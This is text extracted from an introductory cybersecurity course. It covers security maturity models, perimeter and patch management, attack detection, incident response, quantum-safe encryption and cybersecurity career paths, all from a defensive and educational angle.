• Security awareness and training: Security awareness and training provide employees with the knowledge and
skills to prevent security breaches.

• Incident response: Incident response (IR) comprises the set of actions that an organization takes to prepare
for, detect, stop, and recover from cyberattacks.

• Auditing and testing: Auditing and testing ensure that security measures are effective and work as intended.

An IT security team or a specialized cybersecurity consultant is usually responsible for creating an organization’s
security strategy. Ideally, this strategy should be in place as soon as an organization forms, but it’s never too late
to start, and the sooner, the better! The organization should review and update its security strategy annually, if
not more frequently, to ensure that it remains effective and relevant given emerging threats and the
organization’s changing objectives and technologies.

Security maturity

An organization’s security strategy is vital to its overall security maturity. Security maturity is how well an
organization can protect its assets and respond to cybersecurity threats. The more advanced an organization’s
security protocols and strategies, the greater its maturity level.

Organizations have many security maturity models to choose from when evaluating their maturity. For simplicity’s
sake, we’ll focus on one popular model: the Cybersecurity Capability Maturity Model (C2M2). Developed
collaboratively by private and public sector organizations, C2M2 is designed to help organizations assess the
state of their cybersecurity capabilities. Organizations can use it as a guide to progress from a less mature state,
where cybersecurity measures might be reactive or poorly developed, to a more mature state, where measures
are proactive, optimized, and well-integrated into the organizational culture.

C2M2 scale

C2M2 uses a scale with four maturity indicator levels (MILs): MIL0, MIL1, MIL2, and MIL3. The levels differ by
specific behaviors, practices, and processes relating to cybersecurity. The following table summarizes the
characteristics of each maturity indicator level.

Level Characteristics
MIL0 Practices are not performed
MIL1 Initial practices are performed but might be ad hoc
Management characteristics:

• Practices are documented

MIL2
• Adequate resources are provided to support the process

• Approach characteristic:

• Practices are more complete or advanced than at MIL1

Cookie Preferences
 Level Characteristics
Management characteristics:

• Activities are guided by policies or other organizational directives

• Responsibility, accountability, and authority for performing the

practices are assigned

• Personnel performing the practices have adequate skills and

MIL3
knowledge

• The effectiveness of activities is evaluated and tracked

Approach characteristic:

Practices are more complete or advanced than at MIL2

Source: US Department of Energy (https://www.energy.gov/sites/default/files/2022-

06/C2M2%20Version%202.1%20June%202022.pdf)

• At MIL0, no one in the organization performs cybersecurity practices.

• At MIL1, these practices exist but are ad hoc, meaning that the practices are disorganized, reactive, and
spontaneous and performed without formal processes or documentation.

• At M1L2, cybersecurity practices are proactive; they’re documented and performed more consistently, and the
process is properly resourced.

• At MIL3, the organization has fully integrated cybersecurity into its strategic planning and considers it a core
aspect of its business operations. People have clearly established roles and responsibilities regarding
cybersecurity practices, and processes are well-defined and well-implemented. They regularly evaluate and
improve their cybersecurity practices based on experiences and the ever-changing threat landscape.

Note: An organization can be mature in one area of security while not being mature in another.

C2M2 applied
To understand how organizations can apply C2M2, consider the following example from the US Department of
Energy. The example shows the model used to evaluate an organization’s ability to reduce vulnerabilities.

Expand each section to learn more.

MIL1

Cookie Preferences
At MIL1, one or more organization members perform the following actions to reduce vulnerabilities:

• Identifies data sources ad hoc to support vulnerability discovery

• Collects and analyzes vulnerability data ad hoc

• Performs vulnerability assessments ad hoc

• Mitigates relevant vulnerabilities ad hoc

MIL2

At MIL2, one or more organization members perform the following actions to reduce vulnerabilities:

• Monitors vulnerability data sources that address higher-priority assets

• Performs vulnerability assessments regularly and when key events occur, such as changes to the
network

• Analyzes identified vulnerabilities, ranks them by severity, and then addresses them appropriately

• Evaluates operational impact before applying mitigations such as patches

• Shares information about vulnerabilities with stakeholders

MIL3

At MIL3, one or more organization members perform the following actions to reduce vulnerabilities:

• Monitors vulnerability data sources that address all relevant IT and OT assets

• Ensures that people independent of the operations being assessed perform vulnerability
assessments

• Reviews the effectiveness of vulnerability mitigation

• Establishes and maintains ways to receive and respond to external reports, such as from public
websites, about vulnerabilities relevant to the organization’s IT and OT assets

Cookie Preferences
 Protect against attacks

What's new?

• Updated and expanded the “What is the goal?” section

• Revised the following sections for clarity:

• Examine the perimeter

• Network segregation

• Patch and vulnerability management

What is the goal?

A perfect, unbeatable security strategy doesn’t exist. Attackers always develop new techniques to bypass
security measures, making current defenses obsolete.

A more realistic and effective security strategy focuses on making successful attacks more difficult to achieve. By
doing so, organizations can deter all but the most determined attackers. Imagine that compromising a certain
organization’s system would cost an attacker USD 100,000 worth of resources. If the compromised system is
worth only USD 80,000 to the attacker, then the attacker is unlikely to attack. Therefore, the defense can work
despite its imperfections.

A practical yet effective security strategy often involves layering defenses, updating and patching systems
regularly, and investing in threat intelligence to stay ahead of emerging threats. These measures increase the
time, cost, and effort required to complete a successful attack, in turn dramatically reducing the likelihood of a
breach.

The goal of cybersecurity is to reduce operational risk to an acceptable level by introducing the correct mixture of
education, processes, and technologies.

Examine the perimeter

One of the first concepts to consider is attack surface. An attack surface is all the points in a system where an
attacker can attempt to enter it, impact it, or obtain data. The attack surface includes all points of vulnerability,
such as interfaces, protocols, and services.

The larger the attack surface, the greater the risk of infiltration. Therefore, a primary goal of any good security
strategy is to keep the attack surface as small as possible. Doing so minimizes vulnerabilities, making the system
Cookie Preferences
less attractive and more difficult for attackers to breach.

Example

Consider an organization that has a payment record system. To reduce the system’s attack surface, the
organization restricts employees’ system access to several office locations. As a result, its cybersecurity team
can ignore external internet traffic at the perimeter, significantly reducing the attack surface for potential
attackers. Instead of having countless IP addresses from which to launch an attack, attackers must first
compromise a trusted device, and then use it for further attacks. This added layer of complexity increases the
challenge for attackers.

Organizations keep giving employees more ways to access internal systems. For example, many organizations
provide remote access methods and permit employees to access systems from personal devices. These features
have helped to improve accessibility, service offerings, and employment flexibility. But they’ve also expanded the
attack surface. As a result, establishing a secure perimeter has become more challenging. Organizations must be
aware of their perimeter and proactively monitor it.

Network segregation
A vital part of secure system design is a demilitarized zone. A demilitarized zone (DMZ) is a network segment
between an organization’s internal, private network and the internet. It’s a buffer zone that adds an extra layer of
safety. To access the internal network, attackers must go through the DMZ. Even if they breach the DMZ, the
internal network is still safe.

Typically, DMZs house servers that must be accessible from the wider internet yet still need protection. These
servers might include web, email, file transfer protocol (FTP), and DNS servers. These servers contain public data,
not sensitive internal data.

This diagram shows a DMZ in action. A legitimate external

user can access servers and applications contained in the
DMZ, the segment between the external and internal
firewalls. But this user cannot access more sensitive servers
and applications in the internal network behind the internal
firewall. For example, a customer might be able to place
orders for a digital payment system or access email. Still,
they cannot access employee records or other customers’
financial data on the internal network.

Cookie Preferences
Patch and vulnerability management
Software vulnerability management involves monitoring and mitigating vulnerabilities in software systems. It
includes patch management, the process of applying patches and updating systems as fixes become available.

When a vendor creates a new version of its software, it might decide to stop supporting the older version. For
example, Microsoft no longer supports older versions of Windows, such as Windows 7. As a result, the company
no longer releases security patches, making Windows 7 devices easy targets for attackers. When possible,
organizations should use software versions that the vendor supports. Otherwise, they should implement
compensating controls that reduce the risk associated with known vulnerabilities. These controls might include
disabling certain features, increasing network security, or increasing monitoring to detect suspicious activity.

Generally, updating software and applications to their latest versions significantly reduces the risk of a successful
attack. Still, new versions of software can also introduce vulnerabilities. Organizations must check with vendors
to know what and when patches are available. If a vendor has no fix for a vulnerability, organizations can
implement temporary compensating controls, such as disabling a feature or reverting to a previous version.

An organization can use a vulnerability scanner to assess what software is vulnerable to a specific attack. A
vulnerability scanner is an application that scans a system for known vulnerabilities, such as outdated software,
missing patches, misconfigured settings, or weak passwords. Some vulnerability scanners are network-based,
examining vulnerabilities by active testing. Others scan static source code for possible errors. Both scanners
produce valuable information for identifying flaws before an attacker does.

Detect attacks

What's new?

• Added a section on antimalware software

• Added a section on AI’s role in attack detection

Antimalware software

A standard method for attacking a system is malware and a standard measure for detecting malware is
antimalware software. Antimalware software, or antivirus software, is specialized software that detects,
quarantines, and even destroys malware on computers or networks. Some well-known antimalware programs
include Malwarebytes, McAfee Antivirus, and Windows Defender Antivirus. You can install this software locally on
a single device or run and manage the software on a centralized server.

Cookie Preferences
Antimalware software detects malware by scanning all device files for signatures. A malware signature is a
pattern of attributes that corresponds to known malware. After identifying a signature in a file, the software
deletes the file, quarantines it, or alerts you that the file might be infected.

Artificial intelligence (AI)

Artificial intelligence (AI) is enhancing organizations’ attack detection and defense. Let’s explore how AI impacts
key areas of attack detection.

Expand each section to learn more.

Logging

AI automates the process of logging and analyzing large volumes of data from various sources. This
manual task would take a human an enormous amount of time, but AI can do it very quickly,
enabling real-time threat detection and prevention.

Network monitoring

AI can analyze traffic patterns and identify anomalies that might indicate an attack. For example, a
sudden surge in network traffic might indicate a distributed denial-of-service (DDoS) attack. With AI,
organizations can detect such anomalies instantly and initiate appropriate countermeasures.

Security Information and Event Management (SIEM)


Security information and event management tools use AI to collate and analyze data across an
organization’s network. These tools identify patterns and correlations, helping to identify potential
security threats. For example, QRadar SIEM sets alert thresholds for abnormal activities, such as
multiple failed login attempts.

Security Operation Center (SOC)


Cookie Preferences
 In a Security Operation Center, AI can help security analysts work more efficiently. Instead of
manually sifting through tons of data to identify potentially malicious activity, analysts can focus on
responding to the alerts that the AI system generates. AI not only saves analysts time but helps
mitigate threats more swiftly.

Machine learning (ML)


Organizations can train AI systems to distinguish between normal and unusual behavior. The AI
trains on historical data that includes legitimate threats and false positives. With the help of machine
learning algorithms, the AI system learns to recognize patterns associated with false positives.

For example, the system might determine that a certain number of failed login attempts from a
trusted internal IP address during working hours is a common pattern of a forgotten password, not a
malicious action. Therefore, the system learns not to trigger an alert in this situation. Over time, it
can become better at reducing false positives, thereby fine-tuning the thresholds and alert
sensitivity. It can even reduce the time spent on false positives by automating the verification
process.

Respond to attacks

What's new?

• Added a scenario to the “Introducing incident response” section to illustrate how the phases work

• Updated the “Benefit of incident response teams” section to reflect the findings of the 2023 Cost
of a Data Breach Report

Introducing incident response

Consider a scenario where HealthyOnline, an online health service provider, experiences a data breach.
Cookie Preferences
 Preparation

Before the breach, HealthyOnline regularly conducted penetration testing to identify potential vulnerabilities.
They also prepared a detailed incident response plan, backed up all critical data, and trained all team
members on their roles and responsibilities for incident response.

Identification

The security team notices an unusual amount of data traffic from the server to an unknown IP address.
HealthyOnline initiates the incident response protocol quickly and confirms a possible data breach.

Containment

The security team immediately starts containment procedures. They isolate the compromised server from
the network to prevent the breach from spreading further. At the same time, they log out active user sessions
to minimize the risk.

Eradication

The security team identifies the malware responsible for the breach and completely removes it from the
system. The team replaces the compromised server with a clean backup and strengthens relevant firewall
rules to prevent recurrence.

Recovery

After ensuring that it has completely removed the threat, the security team reconnects the server to the
network. The organization gradually resumes operations, starting with the most critical services. The security
team resets all employee passwords. The organization informs customers of the incident and recommends
that customers also update their passwords.

Reflection

After operations return to normal, HealthyOnline reflects on the incident and response and summarizes its
findings in a report. The report notes that a recommended software patch had not been applied in time,
leaving a vulnerability that an attacker exploited. In response to this incident, the organization decided to
automate the patching process to avoid similar oversights in the future.

HealthyOnline completed all six phases of the incident response framework, resolving the incident swiftly and
effectively. And by implementing changes based on lessons learned, the organization is more resilient to future
attacks.

Benefit of incident response teams

Organizations benefit from having incident response teams. Response plans can save money.

For example, consider the findings in the 2023 Cost of a Data Breach Report
(https://www.ibm.com/security/data-breach). At organizations with incident response capabilities, the average
cost of a breach was USD 3.62 million in 2023. At organizations without incident response capabilities, the
Cookie
average cost of a breach was USD 5.11 million. This average cost was a difference of USD 1.49 Preferences
million, or 34%.
 Introducing Cryptography

What's new?

• Added a section about quantum encryption’s impact on cybersecurity

Quantum encryption
Present-day computers lack the power and stability to crack modern encryption technologies. But quantum
computing might be able to do so soon.

Quantum computing is a rapidly emerging technology that harnesses the laws of quantum mechanics to
solve problems too complex for classical computers.

– What is quantum computing? (https://www.ibm.com/topics/quantum-computing) IBM

Quantum computing processes information using quantum mechanics. As a result, it can perform complex
calculations much faster than traditional computing methods.

So, how does quantum computing relate to cryptography? It’s a threat in the hands of cyberattackers.
Its ability to factorize large prime numbers, the base for existing cryptography, might render current
encryption methods ineffective. Organizations need new strategies to defend against this new threat.
Enter quantum-safe encryption.

Quantum-safe encryption refers to security methods and protocols resistant to quantum computing attacks.
Experts have proposed many post-quantum cryptography alternatives to defend against quantum computing
attacks. Let’s explore the four types of encryption that experts predict will effectively counter quantum
computing attacks:

• Lattice-based encryption uses multidimensional geometric structures to encrypt data, creating a puzzle that is
challenging for even quantum computers to solve.

•
Cookie Preferences
 Hash-based encryption transforms data into a character string by using a hash function. The result is a unique
output that is difficult to reverse engineer, even for quantum computers.

• Multivariate encryption uses several different math equations and variables at the same time. This approach is
highly complex and tough for quantum computers to crack.

• Code-based encryption transforms data into encoded messages that are difficult to decode without the correct
algorithm, even for quantum computers.

Introducing threat intelligence

What's new?

• Added a section about AI-enabled threat intelligence

Artificial intelligence (AI) and threat intelligence

Computer systems can gather and process data much faster than humans, making artificial intelligence (AI)
especially valuable for obtaining threat intelligence. Let’s explore several types of AI-enabled threat intelligence.

Expand each section to learn more.

Natural language processing (NLP)


AI-enabled natural language processing (NLP) systems can automatically recognize and pull out key
data points about threats. Notably, NLP systems extract these points from unstructured data. That’s
data, such as images and text messages, that lacks any built-in structure that typical computers can
easily read. Conventional data tools and methods struggle to process and analyze it. But NLP
systems can effectively parse unstructured data sources, such as social media feeds and news
articles, to collect relevant threat intelligence. The technology helps organizations stay current on
IoCs and attack methods. (1)

Cookie Preferences
 Threat intelligence sharing

Combating emerging threats isn’t an individual effort; it requires organizations and security teams to
share threat intelligence. Traditional sharing methods involve manual, often time-consuming
processes. But with AI, organizations can automate sharing. Plus, the technology is sophisticated
enough to share information pertinent to the threat without disclosing personally identifiable
information, strategic plans, or other confidential data.(1)

Source: (1) Arora, Beenu. How AI-Enabled Threat Intelligence Is Becoming Our Future
(https://www.forbes.com/sites/forbestechcouncil/2023/07/21/how-ai-enabled-threat-
intelligence-is-becoming-our-future/?sh=7c1d027d727e). Forbes, July 21, 2023.

Predictive analytics

AI is especially useful for predictive analytics. Predictive analytics is a type of analytics where you
combine historical data with techniques such as statistical modeling and machine learning to make
predictions (2). With AI, organizations can create more effective predictive models, helping them
anticipate and address threats before they arise.

Source: (2) What is predictive analytics? (https://www.ibm.com/topics/predictive-analytics) IBM,

accessed December 7, 2023.

You’ve reached the end of the lesson. Be sure to select the “I’ve checked it out” checkbox to take a mini quiz to
check your understanding of this lesson. Passing this quiz is required for lesson completion.

What's new - a career in cybersecurity

15 मिनट

Cookie Preferences
 Job market

What's new?

• Added a section that describes the industries in which cybersecurity professionals work

• Updated the facts listed in the “Current job market” section

Industries in which cybersecurity professionals work

Large companies and government organizations all need cybersecurity professionals to protect their systems,
networks, and data. The financial, government, education, and retail sectors are some of the most prominent
players because of their size. But nearly all organizations need some form of cybersecurity, and the need crosses
all industries.

Cybersecurity is critical in nearly every industry. And the field of cybersecurity continues to grow!

The following list highlights some industries with high demand for cybersecurity professionals.

• Computer technology

• Finance and banking

• Healthcare and pharmaceuticals

• Education

• Retail and e-commerce

• Gaming

• Transportation and logistics

• Energy and utilities

• Government and public sector

• Manufacturing

• Media and entertainment

• Telecommunications

• Hospitality and tourism

• Insurance
Cookie Preferences
•
 Real estate

• Nonprofit and social sector

• Agriculture

• Construction

• Automotive

• Aerospace and defense

Current job market

One clear trend is that cybersecurity is a fast-growing market with tremendous career opportunities. The
numbers show that organizations will have a huge need for cybersecurity professionals over the next decade.

Consider the following facts:

32% projection

Cybersecurity job opportunities will grow 32% by 2032, much faster than the average growth rate for all
occupations.

– US Bureau of Labor Statistics (https://www.bls.gov/ooh/computer-and-information-

technology/information-security-analysts.htm)

4 million jobs unfilled

Estimates indicate that 5.5 million cybersecurity professionals are working worldwide, and 4 million are still
needed.

– 2023 (ISC)2 Cybersecurity Workforce Study

(https://media.isc2.org/-/media/Project/ISC2/Main/Media/documents/research/ISC2_Cybersecurity_Wor
kforce_Study_2023.pdf?rev=28b46de71ce24e6ab7705f6e3da8637e)

Ranked #7

US News & World Report compiled a list of America’s 100 best jobs based on earning potential, job
satisfaction, and job openings. Information security engineers, or cybersecurity engineers, are ranked #7.

– US News & World Report (https://money.usnews.com/careers/best-jobs/rankings/the-100-best-jobs)

Core attributes and skills

Cookie Preferences
 What's new?

• Replaced discussion of core attributes and skills and “Skill areas to build” with detailed discussion
and examples of three new skill categories:

• Baseline

• Workplace

• Specialized

Skills to build

Cybersecurity careers span many different industries and roles. You can find various cybersecurity jobs that
revolve around preserving the confidentiality, integrity, and availability of systems, networks, and data. If this
work interests you, you should start building the skills that you need.

Cybersecurity professionals need many types of skills and knowledge. Let’s break them into three categories:

• Baseline

• Workplace

• Specialized

You’ll explore each category in turn.

Baseline skills
If you want to work in cybersecurity, you must be adept at working with technology and security tools. Although
you might not need to know multiple specialized security technologies, having experience in information
technology (IT) support is helpful.

You’ll also need baseline or technical skills and knowledge specific to and practical for cybersecurity. Specifically,
you should have skills and knowledge in the following areas. The order in which these skills are listed does not
indicate their importance or priority.

To help you understand how someone might use each skill in their job, you’ll explore examples from a day in the
life of Liv, a cybersecurity professional at an international company.

Expand each section to learn more.

Cookie Preferences
Information security and assurance

Liv starts her day by checking the company’s IT infrastructure. She does so by using her information
security and assurance skills. Information security and assurance involves protecting and ensuring
the confidentiality, integrity, and availability of data from unauthorized access, use, or modification.

Liv ensures that all data remains confidential, intact, and available. If she detects suspicious activity,
she uses her technical expertise to trace its source and implement measures to prevent future
occurrences.

Security assurance

Liv performs security assurance throughout the day. Security assurance involves verifying that
security controls effectively protect networks and devices from threats.

Liv verifies that security controls such as firewalls, intrusion detection systems, antimalware
software, and encryption protocols are up-to-date and functioning effectively to prevent potential
attacks.

Threat analysis

During her day, Liv performs threat analysis. Threat analysis involves identifying, analyzing, and
evaluating potential threats to systems or organizations.

Liv identifies potential threats. And by evaluating them in terms of their likelihood and potential
impact, Liv can prioritize a response and apply any necessary countermeasures effectively.

Cryptography

Liv uses her cryptography skills to encode sensitive data that her department must share with other
departments. Cryptography involves securing information by converting it into a code that only
authorized people or systems can decode.

Liv transforms the confidential data into a ciphertext. Only parties with the decryption key can revert
this ciphertext into the original, human-readable form.

Cookie Preferences
 Authentication

Liv reviews authentication logs to ensure that access to the company’s resources is limited to
authorized users. Authentication involves verifying the identity of a person or system trying to
access protected resources to ensure that they are who they say they are.

Risk management and assessment


In the afternoon, Liv uses her risk management and assessment skills in a security meeting. Risk
management and assessment involves identifying, assessing, and limiting risks that organizations
face. She presents the findings of her recent risk assessment and identifies potential risks and
vulnerabilities in existing systems. She also outlines her plan to analyze these threats further to
determine the likelihood and potential impact of the threat actors attacking.

Network Security

Liv concludes her day by meeting with Mario, the network administrator. She serves as a network
security consultant, advising Mario on maintaining and updating network security controls.

Network security involves identifying and implementing controls to protect networks and network
devices from unauthorized access or attacks.

Workplace skills
Employers are searching for candidates with more than just baseline skills. Whether your cybersecurity role
focuses on risk management, cryptography, or another area, your role will also require good workplace skills.
Workplace skills are general, non-technical skills helpful for getting and succeeding in most jobs. Some
employers refer to these skills as employability, soft, or professional skills. Cybersecurity professionals need an
experienced mix of baseline and workplace skills.

To thrive in cybersecurity, you’ll need the following workplace skills. The order in which these skills are listed
does not indicate their importance or priority.

To help you understand the importance of each skill in a cybersecurity job, you’ll explore examples from a
scenario involving Arianna, a cybersecurity professional at a startup company.
Cookie Preferences
Expand each section to learn more.

Critical thinking

Arianna, a cybersecurity professional at a startup company, receives an alert from her network
monitoring tool indicating a new, unknown security threat in the company’s network. Arianna
analyzes the situation and identifies the nature of the threat and its potential impact.

Critical thinking involves analyzing complex cybersecurity challenges, identifying potential threats,
and making informed decisions about how to address them.

Attention to detail

Arianna spots a vital clue in a log file, which leads to her determining the threat’s origin.

Using attention to detail, you should carefully observe and analyze security measures, processes,
and data. A subtle clue in a log file or intelligence source might be the key to identifying the cause of
a data breach.

Problem solving

Arianna determines an effective solution to neutralize the threat, ensuring that data and systems
remain protected. The solution involves a technical fix and a change in process.

Many known and unknown issues arise that can cause threats to an organization’s cybersecurity. To
keep data and systems safe, you’ll need problem-solving skills to identify the source of each
potential security issue and resolve it.

Communication

Arianne can’t resolve the issue alone; she needs to persuade others to accept her assessment of the
problem and help her implement her solution. Arianna conveys complex technical information about
the threat and her proposed solution to her coworkers. She creates a report about the threat and
presents her findings and recommendations in a meeting.
Cookie Preferences
 Communication with team members and other stakeholders is inevitable and sometimes even
critical. You must also be able to convey information, ideas, and thoughts clearly and understandably
to technical and non-technical audiences.

Collaboration

Arianna works with her team on the issue. She also collaborates and communicates with other
members of the security and network teams and with consultants and external vendors. Together,
they resolve the issue and take measures to prevent similar incidents in the future.

Depending on your organization and role, you’ll collaborate with members of a cybersecurity team or
IT department, and you’ll probably work with other stakeholders, too. You’ll need to share
knowledge with everyone involved and collaborate effectively to improve the organization’s security.

Creative thinking

Arianna wants to ensure that the updated security measures will effectively prevent breaches such
as the one that the organization just experienced. To do so, she creates a simulated cyberattack. She
uses her creativity to anticipate all the ways that someone might attack the new defenses.

You must use creative thinking to think like attackers do and address all potential vulnerabilities that
they might exploit. And when a data breach occurs, you should be able to brainstorm solutions
quickly to stop and contain it.

Adaptability

A few months after the breach, Arianna discovers that her company is shifting to additional cloud-
based services. She immediately familiarizes herself with the technology, its vulnerabilities, and the
best ways to secure data in the cloud-based environment.

Technology evolves at an incredible rate. You must adapt to emerging technologies and new
processes that impact cybersecurity and implement both effectively.

Specialized skills

Cookie Preferences
Baseline and workplace skills aren’t always enough to get a cybersecurity job. Some employers look for
experience in specific frameworks, tools, programming languages, or operating systems. For example, the Linux
operating system runs on most network devices, security applications, and cloud-based servers. You might need
to know Linux to strengthen the security or collect the security data of these devices, applications, and servers.

You might also need specialized knowledge and skills specific to the roles or industries you are most interested
in. For example, if you are interested in working in healthcare, you might need a deeper knowledge of
cybersecurity laws and regulations relating to healthcare, such as the Health Insurance Portability and
Accountability Act (HIPAA) in the US.

As you grow in cybersecurity basics, you might consider exploring some of the following specialized skills:

• Malware analysis

• Computer networking

• Cloud computing and security

• System security, including operating systems such as Linux and Windows

• Programming languages such as Python

• DevOps and DevSecOps

• Cybersecurity governance and compliance

• Incident response

• Threat hunting

• Penetration testing

• Digital forensics

Cybersecurity job roles

What's new?

• Removed nearly all content and replaced it with a discussion of eight in-demand cybersecurity
roles

Roles in the cybersecurity field

Cookie Preferences
The high demand for cybersecurity means that jobs are plentiful in this field. Cybersecurity careers are some of
the fastest-growing careers worldwide. According to LinkedIn
(https://www.linkedin.com/business/talent/blog/talent-acquisition/fastest-growing-jobs-2023), cybersecurity
roles such as cybersecurity engineers, managers, analysts, and specialists are among the fastest-growing careers
across many countries.

Let’s explore some of the most in-demand cybersecurity roles.

Expand each section to learn more.

Cybersecurity Analyst

A cybersecurity analyst, or cyberanalyst, stays one step ahead of cybercriminals to protect
computer systems and networks from cyberthreats.

Tasks and responsibilities: The scope of this role can be broad; typically, a cyberanalyst’s primary
responsibility is to protect an organization’s systems, networks, and data from threats. They monitor
systems for unusual activities or potential security breaches. When they find these issues,
cyberanalysts act to resolve them before serious harm occurs. They also create defensive strategies
to keep the organization’s data safe.

Position: Depending on an organization’s structure, a cybersecurity analyst can be an entry-level,

mid-level, or advanced role.

Network security architect


A network security architect is like the architect of a building but for an organization’s computer
network.

Tasks and responsibilities: A network security architect designs a secure computer network that can
withstand various cyberthreats. This work involves developing and implementing network security
measures and regularly updating them as new threats emerge. They also help to recover the network
if a security breach occurs.

Position: A network security architect is typically a mid-level or advanced role.

Penetration tester

Cookie Preferences
A penetration tester, or pen tester, is a type of offensive security researcher or ethical hacker.

Tasks and responsibilities: As their title implies, a pen tester performs penetration testing: they
simulate real hacking techniques to find vulnerabilities in an organization’s digital systems that
attackers can exploit. They confirm that vulnerabilities identified in vulnerability scans are real
weaknesses worth addressing. They also uncover any other vulnerabilities missed by vulnerability
scans and other assessments. After pen testing is complete, they report their findings to the
organization so that it can address discovered vulnerabilities before attackers target them.

Position: Depending on an organization’s structure, a pen tester can be an entry-level, mid-level, or

advanced role.

Malware analyst

A malware analyst is someone specifically trained to deal with malware threats.

Tasks and responsibilities: A malware analyst investigates suspicious files or programs that they
think might be malware. They closely study potential malware to determine how it works and how to
stop it. This kind of work requires a deep knowledge of computers and programming languages and
an aptitude for problem solving. You’ll also need to keep informed on the latest malware threats and
controls.

Position: A malware analyst is typically a mid-level or advanced role.

Cybersecurity engineer

A cybersecurity engineer safeguards computer systems and networks from threats.

Tasks and responsibilities: A cybersecurity engineer’s primary responsibility is to design, build, and
maintain security architectures to protect sensitive information from cyberthreats. They constantly
monitor the infrastructure for unusual activities, investigate security breaches, and ensure that data
remains safe from potential attacks. They also conduct routine testing and simulations to identify
and mitigate vulnerabilities, ensuring that digital infrastructure remains secure against evolving
cyberthreats.

Position: A cybersecurity engineer is typically a mid-level or advanced role.

Security software developer


A security software developer designs and develops secure software to protect it from potential
cyberthreats.

Cookie Preferences
 Tasks and responsibilities: A security software developer integrates security measures into all
stages of the software development lifecycle (SDLC). They’re also responsible for updating and
patching existing software to reinforce its defenses as new threats emerge.

Position: A security software developer is typically a mid-level or advanced role.

Application security engineer


Like a security software developer, an application security engineer is concerned with software
security. But while a security software developer develops the software directly, an application
security engineer examines and maintains the systems and processes used to develop and run that
software.

Tasks and responsibilities: An application security engineer works closely with developers
throughout the SDLC, implementing security measures at every stage to ensure that all software is
secure before being deployed to production. They also review, scan, and test code directly to identify
vulnerabilities.

Position: An application security engineer is typically a mid-level role.

Digital forensics investigator


A digital forensics investigator is like a digital detective!

Tasks and responsibilities: A digital forensics investigator retrieves, examines, and analyzes digital
evidence to investigate cybercrimes. Their work starts after the cybercrime is committed. They use
forensic tools and a deep understanding of attack frameworks to examine digital data, recover lost or
damaged files, and trace digital footprints back to the cybercriminal.

Position: Depending on an organization’s structure, a digital forensics investigator can be an entry-

level, mid-level, or advanced role.

You’ve reached the end of the lesson. Be sure to select the “I’ve checked it out” checkbox to take a mini quiz to
check your understanding of this lesson. Passing this quiz is required for lesson completion.

Cookie Preferences